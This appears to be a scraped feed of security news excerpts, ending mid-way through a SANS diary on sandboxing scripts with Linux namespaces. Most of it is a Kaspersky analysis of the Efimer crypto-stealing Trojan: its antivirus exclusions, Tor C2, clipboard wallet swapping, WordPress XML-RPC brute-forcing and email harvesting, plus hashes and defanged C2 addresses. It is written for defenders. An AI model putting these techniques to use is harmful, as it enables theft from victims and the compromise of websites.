Injection Attacks (2023–) Input integrity failure Attackers embedded hidden prompts in emails, documents, and websites that hijacked AI assistants, causing them to treat malicious instructions as legitimate commands. CrowdStrike Outage (2024) Processing integrity failure A faulty software update from CrowdStrike caused 8.5 million Windows computers worldwide to crash—grounding flights, shutting down hospitals, and disrupting banks. The update, which contained a software logic error, hadn’t gone through full testing protocols. Voice-Clone Scams (2024) Input and processing integrity failure Scammers used AI-powered voice-cloning tools to mimic the voices of victims’ family members, tricking people into sending money. These scams succeeded because neither phone systems nor victims identified the AI-generated voice as fake. This essay was written with Davi Ottenheimer, and originally appeared in IEEE Spectrum.
schneier.comAug 22, 2025extracted
Wikimedia Foundation loses first court battle to swerve Online Safety Act regulation
AI and ml Payments giant Stripe is about to drop over $7 billion to become a gateway to AI token salesAI gateways look promising as companies struggle with model orchestration ai and ml Anthropic says text watermarking scheme relies on inconsequential words'Shall I compare thee to a summer's afternoon' is the sort of thing this will make, and others look likely to adopt it AI and ML DeepSeek's innovative harness treats everything as a plug-inChinese AI labs keep moving forward while US labs play defense SECURITY Autonomous AI attacks pose 'clear and present danger' to critical infrastructureWeaponized agents could turn digital intrusions into kinetic disasters, experts warn off-prem Rent-a-GPU outfit Nebius promises rapid 1 GW powerup plan isn't nebulousAnd it'll jump through every financial hoop it can to get there Security Russians are posing as Signal support to launch phishing attacksPLUS: US takes down Iranian propaganda sites; Marketing company asks 'Why Do We Have Your Information?' And more! Security Microsoft patches failed to fix on-prem SharePoint, which is now under zero-day attackPLUS: China upgrades smartphone surveillance tools; Ring eases anti-snooping stance; and more Black Hat and DEF CON DEF CON Franklin project enlists hackers to harden critical infrastructureVoting village reports have been so successful, says Jeff Moss, that the whole of DEF CON will now be included Security EQT buys majority share in Swiss cybersecurity biz AcronisWent at equivalent of $3.5B+ valuation for entire firm, though portion sold not specified Malware Month Ten years since the first corp ransomware, Mikko Hyppönen sees no end in sightOn the plus side, infosec's a good bet for a long, stable career FOSS smashed one Microsoft monopoly. After 20 years of failure, it's time to smash anotherWord up GNOME can look like Windows – and Flashback can do it without extensionsNew 'Simple-taskbar' is an option, but there's a simpler, stabler way A moment of silence, please, for the final release of Debian on x86-32New Debian versions hit FOSSland in the form of 13.6 and 12.15 Baddies caught exploiting extensions bugs with perfect 10 scores on vulnerable Joomla websitesFlaws in iCagenda, Balbooa Forms extensions can impact open source CMS that powers a million sites worldwide Frame: A new X11 server – implemented directly in assemblyJoins yserver, Phoenix, and of course XLibre – and outlier Arcan Cinnamon 6.8 will support Wayland – if you want itNext version of Linux Mint’s desktop has both kinds of display server
go.theregister.comAug 11, 2025extracted
Wikipedia’s operator loses challenge to UK Online Safety Act rules
Wikipedia’s operator loses challenge to UK Online Safety Act rules A U.K. court on Monday dismissed a challenge brought by the Wikimedia Foundation to the country’s Online Safety Act, which could prevent unverified users from making edits or adding to posts. The organization, which operates Wikipedia, preemptively brought the challenge under the assumption that it would be labeled as a “category 1” platform, which it argues “would undermine the privacy and safety of Wikipedia’s volunteer contributors, expose the encyclopedia to manipulation and vandalism, and divert essential resources from protecting people and improving Wikipedia.” User verification — just one of several requirements for category 1 platforms — ”could expose contributors to data breaches, stalking, lawsuits, or even imprisonment by authoritarian regimes,” Wikimedia Foundation said in a statement. Although the U.K.’s High Court of Justice dismissed the foundation’s challenge, it said it would revisit the case if the organization was classified as category 1 by Ofcom — the country’s communications regulator — later this year. User verification rules have expanded in the United States as well as Europe in recent years, bringing pushback from online platforms that say they impose unreasonable requirements and limit free speech. In June, the U.S. Supreme Court ruled that a Texas law that requires people to prove their age to access online pornography was constitutional. Several other states have similar laws on the books. Category 1 services are defined under the rules as large user-to-user platforms that use content recommendation systems, such as Facebook, X and Google. Wikimedia, a nonprofit, argued that it is different from these organizations because it provides a volunteer-based digital public good, and the requirements would be “exceptionally burdensome” to Wikipedia’s operations. The judge appeared sympathetic to this argument, commenting on Wikipedia’s “significant value” and recognizing the damages that a category 1 label could have on the organization. The ruling “does not give Ofcom and the Secretary of State a green light to implement a regime that would significantly impede Wikipedia’s operations,” senior High Court judge Justice Johnson said, adding that it may be possible for Ofcom to flexibly interpret the rules or for lawmakers to amend the act. Adam Janofsky is the founding editor-in-chief of The Record from Recorded Future News. He previously was the cybersecurity and privacy reporter for Protocol, and prior to that covered cybersecurity, AI, and other emerging technology for The Wall Street Journal.
therecord.mediaAug 11, 2025extracted
Scammers mass-mailing the Efimer Trojan to steal crypto
Introduction In June, we encountered a mass mailing campaign impersonating lawyers from a major company. These emails falsely claimed the recipient’s domain name infringed on the sender’s rights. The messages contained the Efimer malicious script, designed to steal cryptocurrency. This script also includes additional functionality that helps attackers spread it further by compromising WordPress sites and hosting malicious files there, among other techniques. Report summary: Efimer is spreading through compromised WordPress sites, malicious torrents, and email. It communicates with its command-and-control server via the Tor network. Efimer expands its capabilities through additional scripts. These scripts enable attackers to brute-force passwords for WordPress sites and harvest email addresses for future malicious email campaigns. Kaspersky products classify this threat with the following detection verdicts: HEUR:Trojan-Dropper.Script.Efimer HEUR:Trojan-Banker.Script.Efimer HEUR:Trojan.Script.Efimer HEUR:Trojan-Spy.Script.Efimer.gen Technical details Background In June, we detected a mass mailing campaign that was distributing identical messages with a malicious archive attached. The archive contained the Efimer stealer, designed to pilfer cryptocurrency. This malware was dubbed “Efimer” because the word appeared in a comment at the beginning of its decrypted script. Early versions of this Trojan likely emerged around October 2024, initially spreading via compromised WordPress websites. While attackers continue to use this method, they expanded their distribution in June to include email campaigns. Email distribution The emails that users received claimed that lawyers from a large company had reviewed the recipient’s domain and found words or phrases in its name that infringed upon their registered trademarks. The emails threatened legal action but offered to drop the lawsuit if the domain owner changed the domain name. Furthermore, they even expressed willingness to purchase the domain. The specific domain was never mentioned in the email. Instead, the attachment supposedly contained “details” about the alleged infringement and the proposed buyout amount. In a recent phishing attempt, targets received an email with a ZIP attachment named “Demand_984175” (MD5: e337c507a4866169a7394d718bc19df9). Inside, recipients found a nested, password-protected archive and an empty file named “PASSWORD – 47692”. It’s worth noting the clever obfuscation used for the password file: instead of a standard uppercase “S”, the attackers used the Unicode character U+1D5E6. This subtle change was likely implemented to prevent automated tools from easily extracting the password from the filename. If the user unzips the password-protected archive, they’ll find a malicious file named “Requirement.wsf”. Running this file infects their computer with the Efimer Trojan, and they’ll likely see an error message. Here’s how this infection chain typically plays out. When the Requirement.wsf script first runs, it checks for administrator privileges. It does this by attempting to create and write data to a temporary file at C:\\Windows\\System32\\wsf_admin_test.tmp. If the write is successful, the file is then deleted. What happens next depends on the user’s access level: If the script is executed on behalf of a privileged user, it adds the C:\\Users\\Public\\controller folder to the Windows Defender antivirus exclusions. This folder will then be used to store various files. It also adds to exclusions the full path to the currently running WSF script and the system processesC:\\Windows\\System32\\exe andC:\\Windows\\System32\\cmd.exe . Following this, the script saves two files to the aforementioned path: “controller.js” (containing the Efimer Trojan) and “controller.xml”. Finally, it creates a scheduler task in Windows, using the configuration from controller.xml. If the script is run with limited user privileges, it saves only the controller.js file to the same path. It adds a parameter for automatic controller startup to the HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\controller registry key. The controller is then launched via the WScript utility. Afterward, the script uses WScript methods to display an error message dialog box and then exits. This is designed to mislead the user, who might be expecting an application or document to open, when in reality, nothing useful occurs. Efimer Trojan The controller.js script is a ClipBanker-type Trojan. It’s designed to replace cryptocurrency wallet addresses the user copies to their clipboard with the attacker’s own. On top of that, it can also run external code received directly from its command-and-control server. The Trojan starts by using WMI to check if Task Manager is running. If it is, the script exits immediately to avoid detection. However, if Task Manager isn’t running, the script proceeds to install a Tor proxy client on the victim’s computer. The client is used for communication with the C2 server. The script has several hardcoded URLs to download Tor from. This ensures that even if one URL is blocked, the malware can still retrieve the Tor software from the others. The sample we analyzed contained the following URLs: The file it downloads from one of the URLs (A46913AB31875CF8152C96BD25027B4D) is the Tor proxy service. The Trojan saves it to C:\\Users\\Public\\controller\\ntdlg.exe. If the download fails, the script terminates. Assuming a successful download, the script launches the file with the help of WScript and then goes dormant for 10 seconds. This pause likely allows the Tor service to establish a connection with the Onion network and initialize itself. Next, the script attempts to read a GUID from C:\\Users\\Public\\controller\\GUID. If the file cannot be found, it generates a new GUID via createGUID() and saves it to the specified path. The GUID format is always vs1a- , for example, vs1a-1a2b. The script then tries to load a file named “SEED” from C:\\Users\\Public\\controller\\SEED. This file contains mnemonic phrases for cryptocurrency wallets that the script has collected. We’ll delve into how it finds and saves these phrases later in this post. If the SEED file is found, the script sends it to the server and then deletes it. These actions assume that the script might have previously terminated improperly, which would have prevented the mnemonic phrases from being sent to the server. To avoid losing collected data in case of an error, the malware saves them to a file before attempting to transmit them. At this point, the controller concludes its initialization process and enters its main operation cycle. The main loop In each cycle of operation, the controller checks every 500 milliseconds whether Task Manager is running. As before, if it is, the process exits. If the script doesn’t terminate, it begins to ping the C2 server over the Tor network. To do this, the script sends a request containing a GUID (Globally Unique Identifier) to the server. The server’s response will be a command. To avoid raising suspicion with overly frequent requests while maintaining constant communication, the script uses a timer (the p_timer variable). As we can see, every 500 milliseconds (half a second), immediately after checking if Task Manager is running, p_timer decrements by 1. When the variable reaches 0 (it’s also zero on the initial run), the timer is reset using the following formula: the PING_INT variable, which is set to 1800, is multiplied by two, and the result is stored in p_timer. This leaves 1800 seconds, or 30 minutes, until the next update. After the timer updates, the PingToOnion function is called, which we discuss next. Many similar malware strains constantly spam the network, hitting their C2 server for commands. The behavior quickly gives them away. A timer allows the script to stay under the radar while maintaining its connection to the server. Making requests only once every half an hour makes them much harder to spot in the overall traffic flow. The PingToOnion function works hand-in-hand with CheckOnionCMD. In the first one, the script sends a POST request to the C2 using the curl utility, routing the request through a Tor proxy located at localhost:9050 at the address: The server’s response is saved to the user’s %TEMP% directory at %TEMP%\cfile. After a request is sent to the server, CheckOnionCMD immediately kicks in. Its job is to look for a server response in a file named “cfile” located in the %TEMP% directory. If the response contains a GUID command, the malware does nothing. This is likely a PONG response from the server, confirming that the connection to the C2 server is still alive and well. However, if the first line of the response contains an EVAL command, it means all subsequent lines are JavaScript code. This code will then be executed using the eval function. Regardless of the server’s response, the Trojan then targets the victim’s clipboard data. Its primary goal is to sniff out mnemonic phrases and swap copied cryptocurrency wallet addresses with the attacker’s own wallet addresses. First, it scans the clipboard for strings that look like mnemonic (seed) phrases. If it finds any, these phrases are saved to a file named “SEED” (similar to the one the Trojan reads at startup). This file is then exfiltrated to the server using the PingToOnion function described above with the action SEED parameter. Once sent, the SEED file is deleted. The script then takes five screenshots (likely to capture the use of mnemonic phrases) and sends them to the server as well. They are captured with the help of the following PowerShell command: The FileToOnion function handles sending files to the server. It takes two arguments: the file itself (in this case, a screenshot) and the path where it needs to be uploaded. Screenshots are sent to the following path on the server: Files are also sent via a curl command: After sending the file, the script goes idle for 50 seconds. Then, it starts replacing cryptocurrency wallet addresses. If the clipboard content is only numbers, uppercase and lowercase English letters, and includes at least one letter and one number, the script performs additional checks to determine if it’s a Bitcoin, Ethereum, or Monero wallet. If a matching wallet is found in the clipboard, the script replaces it according to the following logic: Short Bitcoin wallet addresses (starting with “1” or “3” and 32–36 characters long) are replaced with a wallet whose first two characters match those in the original address. For long wallet addresses that start with “bc1q” or “bc1p” and are between 40 and 64 characters long, the malware finds a substitute address where the last character matches the original. If a wallet address begins with “0x” and is between 40 and 44 characters long, the script replaces it with one of several Ethereum wallets hardcoded into the malware. The goal here is to ensure the first three characters match the original address. For Monero addresses that start with “4” or “8” and are 95 characters long, attackers use a single, predefined address. Similar to other wallet types, the script checks for matching characters between the original and the swapped address. In the case of Monero, only the first character needs to match. This means the malware will only replace Monero wallets that start with “4”. This clipboard swap is typically executed with the help of the following command: After each swap, the script sends data to the server about both the original wallet and the replacement. Distribution via compromised WordPress sites As mentioned above, in addition to email, the Trojan spreads through compromised WordPress sites. Attackers search for poorly secured websites, brute-force their passwords, and then post messages offering to download recently released movies. These posts include a link to a password-protected archive containing a torrent file. The torrent file downloads a folder to the device. This folder contains something that looks like a movie in XMPEG format, a “readme !!!.txt” text file, and an executable that masquerades as a media player. To watch a movie in the XMPEG format, the user would seemingly need to launch xmpeg_player.exe. However, this executable is actually another version of the Efimer Trojan installer. Similar to the WSF variant, this EXE installer extracts the Trojan’s main component into the C:\\Users\\Public\\Controller folder, but it’s named “ntdlg.js”. Along with the Trojan, the installer also extracts the Tor proxy client, named “ntdlg.exe”. The installer then uses PowerShell to add the script to startup programs and the “Controller” folder to Windows Defender exclusions. The extracted Trojan is almost identical to the one spread via email. However, this version’s code includes spoofed wallets for Tron and Solana, in addition to the Bitcoin, Ethereum, and Monero wallets. Also, the GUID for this version starts with “vt05”. Additional scripts On some compromised machines, we uncovered several other intriguing scripts communicating with the same .onion domain as the previously mentioned ones. We believe the attackers installed these via an eval command to execute payloads from their C2 server. WordPress site compromise Among these additional scripts, we found a file named “btdlg.js” (MD5: 0f5404aa252f28c61b08390d52b7a054). This script is designed to brute-force passwords for WordPress sites. Once executed, it generates a unique user ID, such as fb01- , and saves it to C:\\Users\\Public\\Controller\\. The script then initiates multiple processes to launch brute-force attacks against web pages. The code responsible for these attacks is embedded within the same script, prior to the main loop. To trigger this functionality, the script must be executed with the “B” parameter. Within its main loop, the script initiates itself by calling the _runBruteProc function with the parameter “B”. After a brute-force attack is completed, the script returns to the main loop. Here, it will continue to spawn new processes until it reaches a hardcoded maximum of 20. Thus, the script supports two modes – brute-force and the main one, responsible for the initial launch. If the script is launched without any parameters, it immediately enters the main loop. From there, it launches a new instance of itself with the “B” parameter, kicking off a brute-force attack. The brute-force process starts via the GetWikiWords function: the script retrieves a list of words from Wikipedia. This list is then used to identify new target websites for the brute-force attack. If the script fails to obtain the word list, it waits 30 minutes before retrying. The script then enters its main operation loop. Every 30 minutes, it initiates a request to the C2 server. This is done with the help of the PingToOnion method, which is consistent with the similarly named methods found in other scripts. It sends a BUID command, transmitting a unique user ID along with brute-force statistics. This includes the total number of domains attacked, and the count of successful and failed attacks. After this, the script utilizes the GetRandWords function to generate a list of random words sourced from Wikipedia. Finally, using these Wikipedia-derived random words as search parameters, the script employs the getSeDomains function to search Google and Bing for domains to target with brute-force attacks. The ObjID function calculates an eight-digit hexadecimal hash, which acts as a unique identifier for a special object (obj_id). In this case, the special object is a file containing brute-force information. This includes a list of users for password guessing, success/failure flags for brute-force attempts, and other script-relevant data. For each distinct domain, this data is saved to a separate file. The script then checks if this identifier has been encountered before. All unique identifiers are stored in a file named “UDBXX.dat”. The script searches the file for a new identifier, and if one isn’t found, it’s added. This identifier tracking helps save time by avoiding reprocessing of already known domains. For every new domain, the script makes a request using the WPTryPost function. This is an XML-RPC function that attempts to create a test post using a potential username and password. The command to create the post looks like this: When the XML-RPC request is answered, whether successfully or not, the WPGetUsers function kicks in to grab users from the domain. This function hits the domain at /wp-json/wp/v2/users, expecting a list of WordPress site users in return. This list of users, along with the domain and counters tracking the number of users and passwords brute-forced, gets written to the special object file described above. The ID for this file is calculated with the help of ObjID. After processing a page, the script lies dormant for five seconds before moving on to the next one. Meanwhile, multiple processes are running concurrently on the victim’s computer, all performing brute-force operations. As mentioned before, when the script is launched with the “B” argument, it enters an infinite brute-forcing loop, with each process independently handling its targets. At the start of each iteration, there’s a randomly chosen 1–2 second pause. This delay helps stagger the start times of requests, making the activity harder to detect. Following this, the process retrieves a random object file ID for processing from C:\\Users\\Public\\Controller\\objects by calling ObjGetW. The ObjGetW function snags a random domain object that’s not currently tied up by a brute-force process. Locked files are marked with the LOCK extension. Once a free, random domain is picked for brute-forcing, the lockObj function is called. This changes the file’s extension to LOCK so other processes don’t try to work on it. If all objects are locked, or if the chosen object can’t be locked, the script moves to the next loop iteration and tries again until it finds an available file. If a file is successfully acquired for processing, the script extracts data from it, including the domain, password brute-force counters, and a list of users. Based on these counter values, the script checks if all combinations have been exhausted or if the maximum number of failed attempts has been exceeded. If the attempts are exhausted, the object is deleted, and the process moves on to a new iteration. If attempts remain, the script tries to authenticate with the help of hardcoded passwords. When attempting to guess a password for each user, a web page post request is sent via the WPTryPost function. Depending on the outcome of the brute-force attempt, ObjUpd is called to update the status for the current domain and the specific username-password combination. After the status is updated, the object is unlocked, and the process pauses randomly before continuing the cycle with a new target. This ensures continuous, multi-threaded credential brute-forcing, which is also regulated by the script and logged in a special file. This logging prevents the script from starting over from scratch if it crashes. Successfully guessed passwords are sent to the C2 with the GOOD command. Alternative Efimer version We also discovered another script named “assembly.js” (MD5: 100620a913f0e0a538b115dbace78589). While similar in functionality to controller.js and ntdlg.js, it has several significant differences. Similarly to the first script, this one belongs to the ClipBanker type. Just like its predecessors, this malware variant reads a unique user ID. This time it looks for the ID at C:\\Users\\Public\\assembly\\GUID. If it can’t find or read that ID, it generates a new one. This new ID follows the format M11-XXXX-YYYY, where XXXX and YYYY are random four-digit hexadecimal numbers. Next up, the script checks if it’s running inside a virtual machine environment. If it detects a VM, it prefixes the GUID string with a “V”; otherwise, it uses an “R”. Following this, the directory where the GUID is stored (which appears to be the script’s main working directory) is hidden. After that, a file named “lptime” is saved to the same directory. This file stores the current time, minus 21,000 seconds. Once these initial setup steps are complete, the malware enters its main operation loop. The first thing it does is check the time stored in the “lptime” file. If the difference between the current time and the time in the file is greater than 21,600 seconds, it starts preparing data to send to the server. After that, the script attempts to read data from a file named “geip”, which it expects to find at C:\\Users\\Public\\assembly\\geip. This file contains information about the infected device’s country and IP address. If it’s missing, the script retrieves information from https://ipinfo.io/json and saves it. Next, it activates the Tor service, located at C:\\Users\\Public\\assembly\\upsvc.exe. Afterwards, the script uses the function GetWalletsList to locate cryptocurrency wallets and compile a list of its findings. It prioritizes scanning of browser extension directories for Google Chrome and Brave, as well as folders for specific cryptocurrency wallet applications whose paths are hardcoded within the script. The script then reads a file named “data” from C:\\Users\\Public\\assembly. This file typically contains the results of previous searches for mnemonic phrases in the clipboard. Finally, the script sends the data from this file, along with the cryptocurrency wallets it discovered from application folders, to a C2 server at: After the script sends the data, it verifies the server’s response with the help of the CheckOnionCMD function, which is similar to the functions found in the other scripts. The server’s response can contain one of the following commands: RPLY returns “OK”. This response is only received after cryptocurrency wallets are sent, and indicates that the server has successfully received the data. If the server returns “OK”, the old data file is deleted. However, if the transmission fails (no response is received), the file isn’t deleted. This ensures that if the C2 server is temporarily unavailable, the accumulated wallets can still be sent once communication is re-established. EVAL executes a JavaScript script provided in the response. KILL completely removes all of the malware’s components and terminates its operation. Next, the script scans the clipboard for strings that resemble mnemonic phrases and cryptocurrency wallet addresses. Any discovered data is then XOR-encrypted using the key $@#LcWQX3$ and saved to a file named “data”. After these steps, the entire cycle repeats. “Liame” email address harvesting script This script operates as another spy, much like the others we’ve discussed, and shares many similarities. However, its purpose is entirely different. Its primary goal is to collect email addresses from specified websites and send them to the C2 server. The script receives the list of target websites as a command from the C2. Let’s break down its functionality in more detail. At startup, the script first checks for the presence of the LUID (unique identifier for the current system) in the main working directory, located at C:\\Users\\Public\\Controller\\LUID. If the LUID cannot be found, it creates one via a function similar to those seen in other scripts. In this case, the unique identifier takes the format fl01- . Next, the checkUpdate() function runs. This function checks for a file at C:\\Users\\Public\\Controller\\update_l.flag. If the file exists, the script waits for 30 seconds, then deletes update_l.flag, and terminates its operation. Afterwards, the script periodically (every 10 minutes) sends a request to the server to receive commands. It uses a function named PingToOnion, which is similar to the identically named functions in other scripts. The request includes the following parameters: LIAM: unique identifier action: request type data: data corresponding to the request type In this section of the code, LIAM string is used as the action, and the data parameter contains the number of collected email addresses along with the script operation statistics. If the script unexpectedly terminates due to an error, it can send a log in addition to the statistics, where the action parameter will contain LOGS string, and the data parameter will contain the error message. The request is sent to the following C2 address: The server returns a JSON-like structure, which the next function later parses. The structure dictates the commands the script should execute. This script supports two primary functions: Get a list of email addresses from domains provided by the server The script receives domains and iterates through each one to find hyperlinks and email addresses on the website pages. The GetPageLinks function parses the HTML content of a webpage and extracts all links that reside on the same domain as the original page. This function then filters these links, retaining only those that point to HTML/PHP files or files without extensions. The PageGetLiame function extracts email addresses from the page’s HTML content. It can process both openly displayed addresses and those encapsulated withinmailto links .Following this initial collection, the script revisits all previously gathered links on the C2-provided domains, continuing its hunt for additional email addresses. Finally, the script de-duplicates the entire list of harvested email addresses and saves them for future use. Exfiltrate collected data to the server In this scenario, the script anticipates two parameters from the C2 server’s response:pstack andbuffer , where: - pstack is an array of domains to which subsequent POST requests will be sent; - buffer is an array of strings, each containing data in the format of address,subject,message. The script randomly selects a domain from pstack and then uploads one of the strings from thebuffer parameter to it. This part of the script likely functions as a spam module, designed to fill out forms on target websites. For each successful data submission via a POST request to a specific domain, the script updates its statistics (which we mentioned earlier) with the number of successful transmissions for that domain.If an error occurs within this loop, the script catches it and reports it back to the C2 server with the LOGS command. Throughout the code, you’ll frequently encounter the term “Liame”, which is simply “Email” spelled backwards. Similarly, variations like “Liama”, “Liam”, and “Liams” are also present, likely derived from “Liame”. This kind of “wordplay” in the code is almost certainly an attempt to obscure the malicious intent of its functions. For example, instead of a clearly named “PageGetEmail” function, you’d find “PageGetLiame”. Victims From October 2024 through July 2025, Kaspersky solutions detected the Efimer Trojan impacting 5015 Kaspersky users. The malware exhibited its highest level of activity in Brazil, where attacks affected 1476 users. Other significantly impacted countries include India, Spain, Russia, Italy, and Germany. TOP 10 countries by the number of users who encountered Efimer (download) Takeaways The Efimer Trojan combines a number of serious threats. While its primary goal is to steal and swap cryptocurrency wallets, it can also leverage additional scripts to compromise WordPress sites and distribute spam. This allows it to establish a complete malicious infrastructure and spread to new devices. Another interesting characteristic of this Trojan is its attempt to propagate among both individual users and corporate environments. In the first case, attackers use torrent files as bait, allegedly to download popular movies; in the other, they send claims about the alleged unauthorized use of words or phrases registered by another company. It’s important to note that in both scenarios, infection is only possible if the user downloads and launches the malicious file themselves. To protect against these types of threats, we urge users to avoid downloading torrent files from unknown or questionable sources, always verify email senders, and consistently update their antivirus databases. For website developers and administrators, it’s crucial to implement measures to secure their resources against compromise and malware distribution. This includes regularly updating software, using strong (non-default) passwords and two-factor authentication, and continuously monitoring their sites for signs of a breach. Indicators of compromise Hashes of malicious files 39fa36b9bfcf6fd4388eb586e2798d1a — Requirement.wsf 5ba59f9e6431017277db39ed5994d363 — controller.js 442ab067bf78067f5db5d515897db15c — xmpeg_player.exe 16057e720be5f29e5b02061520068101 — xmpeg_player.exe 627dc31da795b9ab4b8de8ee58fbf952 — ntdlg.js 0f5404aa252f28c61b08390d52b7a054 — btdlg.js eb54c2ff2f62da5d2295ab96eb8d8843 — liame.js 100620a913f0e0a538b115dbace78589 — assembly.js b405a61195aa82a37dc1cca0b0e7d6c1 — btdlg.js Hashes of clean files involved in the attack 5d132fb6ec6fac12f01687f2c0375353 — ntdlg.exe (Tor) Websites hxxps://lovetahq[.]com/sinners-2025-torent-file/ hxxps://lovetahq[.]com/wp-content/uploads/2025/04/movie_39055_xmpg.zip C2 URLs hxxp://cgky6bn6ux5wvlybtmm3z255igt52ljml2ngnc5qp3cnw5jlglamisad[.]onion hxxp://he5vnov645txpcv57el2theky2elesn24ebvgwfoewlpftksxp4fnxad[.]onion
securelist.comAug 8, 2025extracted
Internet Archive is now a US federal depository library
The Internet Archive has become an official U.S. federal depository library, providing online users with access to archived congressional bills, laws, regulations, presidential documents, and other U.S. government documents. U.S. Senator Alex Padilla designated it as such in a July 24 letter to the Superintendent of Documents at the Government Publishing Office, which oversees the Federal Depository Library Program that coordinates a network of over 1,150 such libraries. "Through its Democracy's Library collection, the Internet Archive has already taken steps to provide the public with free access to government publications from around the world. As a federal depository library, the Archive will help the Government Publishing Office advance its mission to digitize and make federal government publications accessible," Padilla said. " I believe that the library will be able to meet the public service goals of the Federal Depository Library Program for some time to come. I am therefore pleased to designate the Internet Archive as a federal depository library." Earlier this month, the free and open digital library also announced that it had reached a significant milestone after archiving 1 trillion web pages. "I think there is a great deal of excitement to have an organization such as the Internet Archive, which has physical collections of materials, but is really known mostly for being accessible as part of the internet," Internet Archive's founder Brewster Kahle said. "And helping integrate these materials into things like Wikipedia, so that the whole internet ecosystem gets stronger as digital learners get closer access into the government materials." The Internet Archive experienced several breaches last year. In early October, an alleged pro-Palestinian group named SN_BlackMeta took down its servers in a DDoS attack, and a different threat actor stole the user data for 31 million users after breaching its authentication database using an exposed GitLab auth token. Weeks later, threat actors also breached the Internet Archive's Zendesk email support platform after the digital library failed to correctly rotate authentication tokens stolen in the previous attack. Overall prevention scores can hide what happens after initial access. Once attackers are using valid credentials, prevention drops sharply. The Blue Report 2026 measures defenses technique by technique across 338 million simulations run in customer production environments. Get the report
bleepingcomputer.comJul 28, 2025extracted
Sinkholing Suspicious Scripts or Executables on Linux, (Fri, Jul 25th)
When you need to analyze some suspicious pieces of code, it's interesting to detonate them in a sandbox. If you don't have a complete sandbox environment available or you just want to avoid generatin noise on your network, why not route the traffic to a sinkhole or NULL-route (read: packets won't be sent across the normal network and default gateway). When you inspect a process using the /proc[1] virtual filesystem, there is a "route" file: remnux@remnux:~$ cat /proc/1180/net/route Iface Destination Gateway Flags RefCnt Use Metric Mask MTU Window IRTT ens19 00000000 01FEA8C0 0003 0 0 100 00000000 0 0 0 ens18 004A10AC 00000000 0001 0 0 0 00FFFFFF 0 0 0 ens19 00FEA8C0 00000000 0001 0 0 0 00FFFFFF 0 0 0 ens19 01FEA8C0 00000000 0005 0 0 100 FFFFFFFF 0 0 0 It displays the IP routing table assigned to this process. Typically, IP addresses are encoded in little-endian hexadecimal values. They can be easily decoded using a few lines of Python: gw = "01FEA8C0" octets = [gw[i:i+2] for i in range(0, len(gw), 2)] ip = '.'.join(str(int(o, 16)) for o in octets) print(ip) # Will return: 1.254.168.192 Does it mean that we could apply a specific routing table to a process? Yes and no... In /proc, the "route" file is read-only. But, Linux is full of features that many people aren't aware of. One of them are namespaces[2]. It's a kernel feature (introduced around 2016 if I remember well) that provides isolation of system resources between processes (a bit like containers). Each namespace type—such as PID, mount, UTS, network, IPC, and user—isolates a specific aspect of the operating system environment. For example, the network namespace gives processes their own network stack, including interfaces and routing tables. Very interesting! Let's try this and run our suscipious script in a dedicated namespace. My suspicious script will be super simple: remnux@remnux:~$ cat sample.sh #!/bin/bash echo "Am I bad?" curl https://isc.sans.edu First example, no network connectivity at all! remnux@remnux:~$ sudo unshare --net bash root@remnux:/home/remnux# ./sample.sh Am I bad? curl: (6) Could not resolve host: isc.sans.edu root@remnux:/home/remnux# ip a 1: lo: mtu 65536 qdisc noop state DOWN group default qlen 1000 link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 root@remnux:/home/remnux# ip r Error: ipv4: FIB table does not exist. Dump terminated root@remnux:/home/remnux# exit remnux@remnux:~$ The unshare command (executed as root) will create a new shell in a new namespace with dropped network settings. When curl is executed, it can't resolve isc.sans.edu nor connect to it. We have a complete network isolation. Second example, let's build a dedicated IP stack that will route packets to another IP address, our synchole. A pair of virtial Ethernet interfaces must be added. In this case, 10.0.0.1 will be the new namespace and 10.0.0.2 the main one. (Note: I'll change the bash prompt to make it clearer) remnux@remnux:~$ sudo unshare --net bash root@remnux:/home/remnux# export PS1="namespace> " namespace> ip link set lo up namespace> ip link add veth0 type veth peer name veth1 namespace> ip link set veth0 up namespace> ip addr add 10.0.0.1/24 dev veth0 namespace> ip a 1: lo: mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000 link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 inet 127.0.0.1/8 scope host lo valid_lft forever preferred_lft forever inet6 ::1/128 scope host valid_lft forever preferred_lft forever 2: veth1@veth0: mtu 1500 qdisc noop state DOWN group default qlen 1000 link/ether b6:5c:6e:ed:c3:62 brd ff:ff:ff:ff:ff:ff 3: veth0@veth1: mtu 1500 qdisc noqueue state LOWERLAYERDOWN group default qlen 1000 link/ether 66:72:35:1f:9f:9e brd ff:ff:ff:ff:ff:ff inet 10.0.0.1/24 scope global veth0 valid_lft forever preferred_lft forever namespace> ip link set veth1 netns 1 On the main namespace (your original shell), create the virtual NIC: root@remnux:/home/remnux# ip addr add 10.0.0.2/24 dev veth1 root@remnux:/home/remnux# ip link set veth1 up Back in the new namespace: namespace> ping 10.0.0.2 PING 10.0.0.2 (10.0.0.2) 56(84) bytes of data. 64 bytes from 10.0.0.2: icmp_seq=1 ttl=64 time=0.020 ms 64 bytes from 10.0.0.2: icmp_seq=2 ttl=64 time=0.034 ms ^C --- 10.0.0.2 ping statistics --- 2 packets transmitted, 2 received, 0% packet loss, time 1023ms rtt min/avg/max/mdev = 0.020/0.027/0.034/0.007 ms Let's add a default route to the IP in the main namespace: namespace> ip route add default via 10.0.0.2 namespace> ping 8.8.8.8 PING 8.8.8.8 (8.8.8.8) 56(84) bytes of data. ^C --- 8.8.8.8 ping statistics --- 13 packets transmitted, 0 received, 100% packet loss, time 12293ms If we run a tcpdump on veth1, we can now capture all the network connection attempts from the namespace: root@remnux:/home/remnux# tcpdump -i veth1 -n tcpdump: verbose output suppressed, use -v or -vv for full protocol decode listening on veth1, link-type EN10MB (Ethernet), capture size 262144 bytes 11:02:32.122380 ARP, Request who-has 10.0.0.2 tell 10.0.0.1, length 28 11:02:32.122408 ARP, Reply 10.0.0.2 is-at b6:5c:6e:ed:c3:62, length 28 11:02:32.154271 IP 10.0.0.1 > 8.8.8.8: ICMP echo request, id 18547, seq 6, length 64 11:02:33.178401 IP 10.0.0.1 > 8.8.8.8: ICMP echo request, id 18547, seq 7, length 64 11:02:34.202411 IP 10.0.0.1 > 8.8.8.8: ICMP echo request, id 18547, seq 8, length 64 ^C 5 packets captured 5 packets received by filter 0 packets dropped by kernel Finally, let's verify the routing table of the shell running in the new namespace: namespace> echo $$ 149522 On the main namespace: root@remnux:/home/remnux# cat /proc/149522/net/route Iface Destination Gateway Flags RefCnt Use Metric Mask MTU 